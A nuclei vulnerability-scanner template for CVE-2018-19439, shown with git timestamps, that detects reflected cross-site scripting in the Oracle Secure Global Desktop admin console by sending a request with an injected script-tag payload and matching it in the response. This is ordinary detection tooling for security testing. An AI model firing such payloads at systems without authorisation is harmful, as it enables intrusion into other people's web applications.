nuclei-templates/cves/CVE-2018-19439.yaml

17 lines
481 B
YAML
Raw Normal View History

2020-06-22 13:35:37 +00:00
id: CVE-2018-19439
info:
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
author: madrobot
2020-06-22 21:47:00 +00:00
severity: high
2020-06-22 13:35:37 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"
matchers:
- type: word
words:
- "<script>alert(1337)</script>"
part: body